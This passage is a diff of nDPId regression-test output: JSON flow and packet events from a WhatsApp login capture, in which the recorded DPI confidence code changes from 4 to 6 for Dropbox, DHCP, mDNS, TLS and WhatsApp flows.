01129{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1432582396509,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582396509,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISQPEAAEARsZnAqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582396509,"flow_last_seen":1432582396509,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582396509,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582396509,"flow_last_seen":1432582396509,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582396509,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582399902,"flow_last_seen":1432582399902,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582399902,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00862{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1432582399902,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582399902,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRFYAAP8Rdk8AAAAA\/\/\/\/\/wBEAEMBNOdfAQEGALYzLg4AAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"} -00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582399902,"flow_last_seen":1432582399902,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582399902,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}} +00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582399902,"flow_last_seen":1432582399902,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582399902,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}} 00862{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1432582401886,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582401886,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRFcAAP8Rdk4AAAAA\/\/\/\/\/wBEAEMBNOddAQEGALYzLg4AAgAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402666,"flow_last_seen":1432582402666,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582402666,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1432582402666,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1432582402666,"pkt":"AQBeAAD7APS5Jrv0CABFAABNW6AAAP8RvFfAqAIE4AAA+xTpFOkAOcRNAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAyAAQhfYWlycGxhecASAAyAAQ=="} -00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402666,"flow_last_seen":1432582402666,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582402666,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} +00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402666,"flow_last_seen":1432582402666,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582402666,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582402667,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1432582402667,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"thread_ts_msec":1432582402667,"pkt":"MzMAAAD7APS5Jrv0ht1gCRl1ADkR\/\/6AAAAAAAAAGJzDGxKYAiT\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5eQMAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADIABCF9haXJwbGF5wBIADIAB"} -00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582402667,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} +00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582402667,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 00862{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1432582404307,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582404307,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRFgAAP8Rdk0AAAAA\/\/\/\/\/wBEAEMBNOdaAQEGALYzLg4ABQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7580000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1432582411561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582411561,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJu4AAC8GqngRbuUOwKgCBBRnwCnUixwguGhbLIAYAUleegAAAQEICm+JVxEt\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7580000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7580000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432582412221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582412221,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJu8AAC8GqncRbuUOwKgCBBRnwCnUixwguGhbLIAYAUlb7AAAAQEICm+JWZ8t\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432582413522,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582413522,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJvAAAC8GqnYRbuUOwKgCBBRnwCnUixwguGhbLIAYAUlW0AAAAQEICm+JXrst\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} 01130{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1432582426553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582426553,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISk3sAAEARXw\/AqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582399902,"flow_last_seen":1432582425196,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1800,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582399902,"flow_last_seen":1432582425196,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1800,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582396509,"flow_last_seen":1432582426553,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432582379591,"flow_last_seen":1432582399306,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582411561,"flow_last_seen":1432582431565,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582396509,"flow_last_seen":1432582426553,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 